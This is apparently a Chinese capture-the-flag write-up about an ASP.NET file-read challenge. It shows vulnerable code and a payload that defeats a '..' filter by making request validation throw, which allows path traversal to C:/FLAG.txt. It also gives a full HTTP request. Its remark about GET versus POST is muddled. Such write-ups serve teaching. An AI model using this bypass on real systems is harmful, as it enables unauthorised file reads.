0x01 源码
bool isBad = false;
try {
if ( Request.Form["filename"] != null ) {
isBad = Request.Form["filename"].Contains("..") == true;
}
} catch (Exception ex) {
}
try {
if (!isBad) {
Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
}
} catch (Exception ex) {
}
我们打开http头可以知道,这是NET4.0
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
[...]
我们观察一下这短代码,首先题目提示flag在c:/FLAG.txt,所以我们必须要穿越目录,但是filename限制了…,我们可以通过构造请求,使得第一个try报错,这样isBad就是false,然后第二个try不报错使得成功读取文件~~
payload:
filename=../../FLAG.txt&qwqeqwe=<!
注意题目查询使用的post,我们这儿只能使用GET
GET / HTTP/1.1
Host: node3.buuoj.cn:29225
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node3.buuoj.cn:29225/
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://node3.buuoj.cn:29225
Connection: close
Cookie: _ga=GA1.2.1327658694.1580490668
Upgrade-Insecure-Requests: 1
filename=../../FLAG.txt&qwqeqwe=<!
我们这儿主要是利用了NET对参数的检查,来造成请求异常~~
